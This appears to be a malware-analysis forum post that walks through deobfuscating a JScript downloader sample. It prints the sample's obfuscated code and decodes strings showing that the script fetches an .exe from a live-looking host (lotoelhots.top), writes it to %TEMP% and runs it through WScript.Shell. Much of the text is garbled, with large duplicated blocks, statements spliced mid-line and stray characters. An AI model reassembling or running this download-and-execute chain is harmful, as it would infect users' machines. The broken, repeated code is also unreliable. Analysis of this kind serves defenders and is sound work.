1055.js
Sample 9 From https://malwaretips.com/threads/4-9-16-9.63068/
(thks to @Solarquest )
6/46
https://www.virustotal.com/en/file/...4a246f75114a2e9c22fc952f23949902e90/analysis/
Why this sample ?
Same reason as usual, I never analyzed the obfuscation used in this script.
1) What it looks like :
After deleting all the junk parts, which are only there to obfuscate a bit more :
Real part used :
I have made a modification to prevent : copy-paste => exec => infection
2) Analyse :
2-1) Main part
We can see the main part, which begins after the function definitions :
2-1-1 ) function DMTYQWD :
2-1-1 ) Inside the if : long parts
The function above is called several times, with a parameter built the same way as seen above : a concatenation of different var contents :
var BHGZY = DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F", VEOSXK);
var ZJFHO = DMTYQWD(BHGZY);
=> It's easy to understand that, this time, DVUNKGXA is a decoding function
2-1-2 ) Let's find the value of VEOSXK, 2nd parameter :
VEOSXK = 203 => value used for the XOR part !
2-1-3 ) With this value, let's analyse the decode function :
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK)
"Scripting.FileSystemObject"
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK);
"expandEnvironmentStrings"
DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U", VEOSXK);
"%TEMP%"
DVUNKGXA("EEO9FC8EQ86E9BREEF", VEOSXK)
"GetTempName"
DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK", VEOSXK);
"WinHttp.WinHttpRequest.5.1"
DVUNKGXA("E5LAEBB3TAES", VEOSXK);
".exe"
DVUNKGXA("A4VBBOAEGA5Z", VEOSXK);
"open"
DVUNKGXA("ACCAEWBFP", VEOSXK);
"get"
DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B", VEOSXK);
"http: //lotoelhots.top/log.php?f=error.sys"
DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z", VEOSXK);
"SetRequestHeader"
DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW", VEOSXK);
"User-Agent"
DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I", VEOSXK);
"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
DVUNKGXA("B8XAEKA5XAFL", VEOSXK);
"send"
DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G", VEOSXK);
"ADODB.Stream"
DVUNKGXA("84JBBWAEJA5X", VEOSXK);
"Open"
DVUNKGXA("9FYB2MBBAAEN", VEOSXK);
"Type" (= 1)
DVUNKGXA("9CPB9CA2QBFDAEQ", VEOSXK);
"Write"
DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J", VEOSXK);
"ResponseBody"
LAST PART :
Sample 9 From https://malwaretips.com/threads/4-9-16-9.63068/
(thks to @Solarquest )
6/46
https://www.virustotal.com/en/file/...4a246f75114a2e9c22fc952f23949902e90/analysis/
Why this sample ?
Same reason as usual, I never analyzed the obfuscation used in this script.
1) What it looks like :
After deleting all the junk parts, which are only there to obfuscate a bit more :
Real part used :
function_DVUNKGXA(RMNYF,VEOSXK){
function DMTYQWD(FSJIEQ) {
var GCQRIZI=false;
try {
VBVSIJC="o";
YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ]();
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
for (var HLTHO=0;HLTHO<HSDCF;HLTHO+=3) {
return DISGB;
}; YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ]();
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
for (var HLTHO=0;HLTHO<HSDCF;HLTHO+=3) {
SUFPWP="x";
KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
PUKVG="r";
AHIXJ="s";
var ZSGVJ=KPMSMGNMR+SUFPWP+PXSIR[MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG](HLTHO, 2);
var COJSPB=parseInt(ZSGVJ);
var CMQLHAF=COJSPB ^ VEOSXK;
CEXDQHZJ="C";
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
}; KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
PUKVG="r";
AHIXJ="s";
var ZSGVJ=KPMSMGNMR+SUFPWP+PXSIR[MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG](HLTHO, 2);
var COJSPB=parseInt(ZSGVJ);
var CMQLHAF=COJSPB ^ VEOSXK;
CEXDQHZJ="C";
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
return DISGB;
function DMTYQWD(FSJIEQ) {
IFEIKY="b";
LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
}; LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
var GCQRIZI=false;
try {
BFIDZSGAU="O";
VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
} catch (BQNMSV) {
};
if (!GCQRIZI) {
}; VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
} catch (BQNMSV) {
};
if (!GCQRIZI) {
LEOQRTKMI="i";
RVMXUFDC="l";
NAZUNWZV="S";
MYDHZLAJ="t";
WZXYJIC="S";
RQTXTKFDV=".";
SCSANW="r";
QXHIWE="h";
MJEBF="p";J
ZDYAB="e";
PBTOFMG="c";
RLYHFTB="W";
IUOQXNVG="l";
var TXAMBU=DMTYQWD(RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG);
JVUKGPIM="o";
JHWDNO="r";
MBLWGTA="n";
GPDYH="d";
YOFQKC="n";
EFDXN="e";
QJRLYA="i";
YUCIJFU="S";
BQKWS="t";
DZIVAHYSB="E";
XVOKPOZ="x";
KJSQAZ="n";
RQCHOZGAR="v";
NJAJV="n";
RTUCECF="p";
WGTIRGO="a";
JIENIDQLF="s";
SHPSLZY="E";
GFHRLAV="r";
ICODUDZHQ="g";
NGHCXU="n";
TBKREUV="m";
DFNZJWOV="t";
XUFYV="i";
YLBUO="D";
NMBOGRWK="A";
GJFEKSJI="P";
UKYMSR="T";
JPSYMX="A";
JWCTCWQED="%";
PBWENOPJ="A";
EPUVSREF="P";
WIKNZVHG="%";
MZWQYF=TXAMBU[SHPSLZY+XVOKPOZ+RTUCECF+WGTIRGO+NGHCXU+GPDYH+DZIVAHYSB+YOFQKC+RQCHOZGAR+QJRLYA+JHWDNO+JVUKGPIM+KJSQAZ+TBKREUV+EFDXN+MBLWGTA+DFNZJWOV+YUCIJFU+BQKWS+GFHRLAV+XUFYV+NJAJV+ICODUDZHQ+JIENIDQLF](JWCTCWQED+JPSYMX+EPUVSREF+GJFEKSJI+YLBUO+PBWENOPJ+UKYMSR+NMBOGRWK+WIKNZVHG);
DAJVOUACS="A";
JSDXPTCD="h";
UIRUK="e";
LAJSXHJ="t";
JGQJRISVW="a";
ZRYMN="o";
CNFAWAPX="d";
CNBIYSARA="c";
RQYPECKVM="C";
LHPVPYFES="r";
var VEOSXK=MZWQYF[CNBIYSARA+JSDXPTCD+JGQJRISVW+LHPVPYFES+RQYPECKVM+ZRYMN+CNFAWAPX+UIRUK+DAJVOUACS+LAJSXHJ](113-111);
VEOSXK= VEOSXK+111;
var BHGZY=DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F",VEOSXK);
var ZJFHO=DMTYQWD(BHGZY);
var WPTGSVGX=DMTYQWD(DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY",VEOSXK));
var QIHARZ=ZJFHO[DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U",VEOSXK)](DVUNKGXA("EEO9FC8EQ86E9BREEF",VEOSXK));
QIHARZ=QIHARZ+"\\";
var UAYPLY=QIHARZ+WPTGSVGX[DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK",VEOSXK)]()+DVUNKGXA("E5LAEBB3TAES",VEOSXK);
var NCUFPVX=DMTYQWD(DVUNKGXA("9CIA2BA5T83LBFCBFUBBNE5F9CVA2MA5D83TBFLBFFBBU99IAEXBAKBEYAELB8CBFTE5SFELE5EFAX",VEOSXK));
NCUFPVX[DVUNKGXA("A4VBBOAEGA5Z",VEOSXK)](DVUNKGXA("ACCAEWBFP",VEOSXK),DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B",VEOSXK),false);
NCUFPVX[DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z",VEOSXK)](DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW",VEOSXK), DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I",VEOSXK));
NCUFPVX[DVUNKGXA("B8XAEKA5XAFL",VEOSXK)]();
var HAZXEJDW= DMTYQWD(DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G",VEOSXK));
HAZXEJDW[DVUNKGXA("84JBBWAEJA5X",VEOSXK)];
HAZXEJDW[DVUNKGXA("9FYB2MBBAAEN",VEOSXK)]=1;
HAZXEJDW[DVUNKGXA("9CPB9CA2QBFDAEQ",VEOSXK)](NCUFPVX[DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J",VEOSXK)]);
if(WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("98ZAAMBDAAEN9FDA4R8DFA2TA7GAEU",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER",VEOSXK)];
if(!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
ZJFHO[DVUNKGXA("8EVB3OAEHA8Z",VEOSXK)](UAYPLY);
RVMXUFDC="l";
NAZUNWZV="S";
MYDHZLAJ="t";
WZXYJIC="S";
RQTXTKFDV=".";
SCSANW="r";
QXHIWE="h";
MJEBF="p";J
ZDYAB="e";
PBTOFMG="c";
RLYHFTB="W";
IUOQXNVG="l";
var TXAMBU=DMTYQWD(RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG);
JVUKGPIM="o";
JHWDNO="r";
MBLWGTA="n";
GPDYH="d";
YOFQKC="n";
EFDXN="e";
QJRLYA="i";
YUCIJFU="S";
BQKWS="t";
DZIVAHYSB="E";
XVOKPOZ="x";
KJSQAZ="n";
RQCHOZGAR="v";
NJAJV="n";
RTUCECF="p";
WGTIRGO="a";
JIENIDQLF="s";
SHPSLZY="E";
GFHRLAV="r";
ICODUDZHQ="g";
NGHCXU="n";
TBKREUV="m";
DFNZJWOV="t";
XUFYV="i";
YLBUO="D";
NMBOGRWK="A";
GJFEKSJI="P";
UKYMSR="T";
JPSYMX="A";
JWCTCWQED="%";
PBWENOPJ="A";
EPUVSREF="P";
WIKNZVHG="%";
MZWQYF=TXAMBU[SHPSLZY+XVOKPOZ+RTUCECF+WGTIRGO+NGHCXU+GPDYH+DZIVAHYSB+YOFQKC+RQCHOZGAR+QJRLYA+JHWDNO+JVUKGPIM+KJSQAZ+TBKREUV+EFDXN+MBLWGTA+DFNZJWOV+YUCIJFU+BQKWS+GFHRLAV+XUFYV+NJAJV+ICODUDZHQ+JIENIDQLF](JWCTCWQED+JPSYMX+EPUVSREF+GJFEKSJI+YLBUO+PBWENOPJ+UKYMSR+NMBOGRWK+WIKNZVHG);
DAJVOUACS="A";
JSDXPTCD="h";
UIRUK="e";
LAJSXHJ="t";
JGQJRISVW="a";
ZRYMN="o";
CNFAWAPX="d";
CNBIYSARA="c";
RQYPECKVM="C";
LHPVPYFES="r";
var VEOSXK=MZWQYF[CNBIYSARA+JSDXPTCD+JGQJRISVW+LHPVPYFES+RQYPECKVM+ZRYMN+CNFAWAPX+UIRUK+DAJVOUACS+LAJSXHJ](113-111);
VEOSXK= VEOSXK+111;
var BHGZY=DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F",VEOSXK);
var ZJFHO=DMTYQWD(BHGZY);
var WPTGSVGX=DMTYQWD(DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY",VEOSXK));
var QIHARZ=ZJFHO[DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U",VEOSXK)](DVUNKGXA("EEO9FC8EQ86E9BREEF",VEOSXK));
QIHARZ=QIHARZ+"\\";
var UAYPLY=QIHARZ+WPTGSVGX[DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK",VEOSXK)]()+DVUNKGXA("E5LAEBB3TAES",VEOSXK);
var NCUFPVX=DMTYQWD(DVUNKGXA("9CIA2BA5T83LBFCBFUBBNE5F9CVA2MA5D83TBFLBFFBBU99IAEXBAKBEYAELB8CBFTE5SFELE5EFAX",VEOSXK));
NCUFPVX[DVUNKGXA("A4VBBOAEGA5Z",VEOSXK)](DVUNKGXA("ACCAEWBFP",VEOSXK),DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B",VEOSXK),false);
NCUFPVX[DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z",VEOSXK)](DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW",VEOSXK), DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I",VEOSXK));
NCUFPVX[DVUNKGXA("B8XAEKA5XAFL",VEOSXK)]();
var HAZXEJDW= DMTYQWD(DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G",VEOSXK));
HAZXEJDW[DVUNKGXA("84JBBWAEJA5X",VEOSXK)];
HAZXEJDW[DVUNKGXA("9FYB2MBBAAEN",VEOSXK)]=1;
HAZXEJDW[DVUNKGXA("9CPB9CA2QBFDAEQ",VEOSXK)](NCUFPVX[DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J",VEOSXK)]);
if(WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("98ZAAMBDAAEN9FDA4R8DFA2TA7GAEU",VEOSXK)](UAYPLY);
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER",VEOSXK)];
if(!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B",VEOSXK)](UAYPLY))
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES",VEOSXK)](UAYPLY);
ZJFHO[DVUNKGXA("8EVB3OAEHA8Z",VEOSXK)](UAYPLY);
I have made a modification to prevent : copy-paste => exec => infection
2) Analyse :
2-1) Main part
We can see the main part, which begins after the function definitions :
var GCQRIZI=false;
try {
catch (BQNMSV) {
};
if (!GCQRIZI) {
try {
BFIDZSGAU="O";
VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
} VMUDSPIAV="M";
FJIBQL="Y";
CNVOFMBOR="G";
ICLNUV="Q";
GCQRIZI=DMTYQWD(ICLNUV+BFIDZSGAU+CNVOFMBOR+VMUDSPIAV+FJIBQL);
catch (BQNMSV) {
};
if (!GCQRIZI) {
...
...
...
}...
...
2-1-1 ) function DMTYQWD :
A function named DMTYQWD is called with a parameter that is a concatenation of var contents, each var containing a char.
We can easily see that this is equivalent to :
Here, the string seems encoded, because it doesn't mean anything.
(we will see later that, in reality, the string passed as parameter is not decoded)
We can easily see that this is equivalent to :
GCQRIZI=DMTYQWD("Q"+"O"+"G"+"M"+"Y");
GCQRIZI=DMTYQWD("QOGMY");
first conclusion : DMTYQWD is a function that is called with a String.
GCQRIZI=DMTYQWD("QOGMY");
Here, the string seems encoded, because it doesn't mean anything.
(we will see later that, in reality, the string passed as parameter is not decoded)
function DMTYQWD(FSJIEQ) {
WScript["C"+"r"+"e'+"a"+"t"+"e"+"O"+"b"+"j"+"e"+"c"+"t"](FSJIEQ)
WScript["CreateObject"](FSJIEQ)
WScript.CreateObject(FSJIEQ)
with :
IFEIKY="b";
LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
};LIZHWZ="c";
FZQOITK="e";
ETADTELKZ="j";
GXRBK="r";
FDUAVO="e";
CHXICZYU="e";
LWXNQS="t";
JVUKTZ="a";
EKRFDP="t";
GEFWLH="O";
IJQOCAYP="C";
return WScript[IJQOCAYP+GXRBK+FDUAVO+JVUKTZ+EKRFDP+CHXICZYU+GEFWLH+IFEIKY+ETADTELKZ+FZQOITK+LIZHWZ+LWXNQS](FSJIEQ);
WScript["C"+"r"+"e'+"a"+"t"+"e"+"O"+"b"+"j"+"e"+"c"+"t"](FSJIEQ)
WScript["CreateObject"](FSJIEQ)
WScript.CreateObject(FSJIEQ)
with :
GCQRIZI=DMTYQWD("QOGMY");
WScript.CreateObject("QOGMY")
=> will automatically fail
WScript.CreateObject("QOGMY")
=> will automatically fail
remember that :
var GCQRIZI=false; at the beginning of this part
Then, the if part is evaluated
Conclusion :
DMTYQWD is used to create an object whose name is given as a parameter in CLEAR
This first time, it was called with an invalid object string as parameter
=> this then allows entering the if part
if ( ! GCQRIZI) {
Conclusion :
DMTYQWD is used to create an object whose name is given as a parameter in CLEAR
This first time, it was called with an invalid object string as parameter
=> this then allows entering the if part
if ( ! GCQRIZI) {
...
...
...
}...
...
2-1-1 ) Inside the if : long parts
The function above is called several times, with a parameter built the same way as seen above : a concatenation of different var contents :
var TXAMBU=DMTYQWD(
RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG
=> "WScript.Shell"
);
RLYHFTB+WZXYJIC+PBTOFMG+SCSANW+LEOQRTKMI+MJEBF+MYDHZLAJ+RQTXTKFDV+NAZUNWZV+QXHIWE+JZDYAB+RVMXUFDC+IUOQXNVG
=> "WScript.Shell"
);
=> WScript.CreateObject("WScript.Shell")
But in a lot of other parts, the function DMTYQWD is called with a var as parameter, whose content is built by a function : DVUNKGXA
var BHGZY = DVUNKGXA("9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F", VEOSXK);
var ZJFHO = DMTYQWD(BHGZY);
=> It's easy to understand that, this time, DVUNKGXA is a decoding function
2-1-2 ) Let's find the value of VEOSXK, 2nd parameter :
A lot of parts are built with the same method : concatenation of strings from vars.
(1) MZWQYF = TXAMBU[
(1) MZWQYF = TXAMBU[
SHPSLZY + XVOKPOZ + RTUCECF + WGTIRGO + NGHCXU + GPDYH + DZIVAHYSB + YOFQKC + RQCHOZGAR + QJRLYA + JHWDNO + JVUKGPIM + KJSQAZ + TBKREUV + EFDXN + MBLWGTA + DFNZJWOV + YUCIJFU + BQKWS + GFHRLAV + XUFYV + NJAJV + ICODUDZHQ + JIENIDQLF
=> "ExpandEnvironmentStrings"
](
=> "ExpandEnvironmentStrings"
](
JWCTCWQED + JPSYMX + EPUVSREF + GJFEKSJI + YLBUO + PBWENOPJ + UKYMSR + NMBOGRWK + WIKNZVHG
=> "%APPDATA%"
);=> "%APPDATA%"
We have seen that :
TXAMBU = WScript.CreateObject("WScript.Shell")
=> MZWQYF = TXAMBU["ExpandEnvironmentStrings"]("%APPDATA%")
(2) var VEOSXK = MZWQYF[=> MZWQYF = TXAMBU["ExpandEnvironmentStrings"]("%APPDATA%")
Example :
=> "C:\Users\DardiM\AppData\Roaming"
=> "C:\Users\DardiM\AppData\Roaming"
CNBIYSARA + JSDXPTCD + JGQJRISVW + LHPVPYFES + RQYPECKVM + ZRYMN + CNFAWAPX + UIRUK + DAJVOUACS + LAJSXHJ
=> "charCodeAt"
](113 - 111);
=> "charCodeAt"
](113 - 111);
=> Example for me :
"C:\Users\DardiM\AppData\Roaming".charCodeAt(2)
=> 2 (0,1,2) => third char : "\" ==> 92 decimal
VEOSXK = 92 + 111 = 203
"C:\Users\DardiM\AppData\Roaming".charCodeAt(2)
=> 2 (0,1,2) => third char : "\" ==> 92 decimal
VEOSXK = 203 => value used for the XOR part !
function DVUNKGXA(RMNYF,VEOSXK){
Conclusion :
"9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F"
A loop retrieving 2 chars for the xor with 203, every 3 chars
With this string as example :
Now, we have all the elements to deobfuscate all parts
2-1-4) Let's deobfuscate all parts :
VBVSIJC="o";
YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[
CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ
=> "toString"
]();
=>RMNYF["toString"]();
=>PXSIR = first_parameter to string (string to decode)
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
=> PXSIR["length"]
=> HSDCF = PXSIR.length => first_parameter length (string length)
for (var HLTHO=0 ; HLTHO < HSDCF ; HLTHO+=3) {
=> index from 0 ; index < first_parameter length ; index = index + 3
return DISGB; // return the first parameter string decoded};YWROMTDOQ="g";
CZFOLZGX="t";
ZUSLM="S";
KFYCYULV="n";
PNFTBO="t";
JZISJ="i";
RTVEPOG="r";
var PXSIR=RMNYF[
CZFOLZGX+VBVSIJC+ZUSLM+PNFTBO+RTVEPOG+JZISJ+KFYCYULV+YWROMTDOQ
=> "toString"
]();
=>RMNYF["toString"]();
=>PXSIR = first_parameter to string (string to decode)
var DISGB="";
ZBKONIRCK="n";
RWVIBGFL="g";
KBOMSOT="h";
FBIJKJMO="l";
NXRIEOXK="e";
ANJECL="t";
var HSDCF=PXSIR[FBIJKJMO+NXRIEOXK+ZBKONIRCK+RWVIBGFL+ANJECL+KBOMSOT];
=> PXSIR["length"]
=> HSDCF = PXSIR.length => first_parameter length (string length)
for (var HLTHO=0 ; HLTHO < HSDCF ; HLTHO+=3) {
=> index from 0 ; index < first_parameter length ; index = index + 3
SUFPWP="x";
KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
PUKVG="r";
AHIXJ="s";
var ZSGVJ=KPMSMGNMR+SUFPWP+
PXSIR[
MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG
=> "substr"
]
(HLTHO, 2);
=> get two chars from the string to decode, at the current index
=> (index,2)
=> example with "9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F"
=> FIRST LOOP
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
=> String["fromCharCode"](CMQLHAF);
=> DISGB+=String.fromCharCode(CMQLHAF);
=> 87 => "W"
}; KPMSMGNMR="0";
WPRSDY="b";
SOVWR="t";
MOTJV="s";
IYGPGWZM="u";
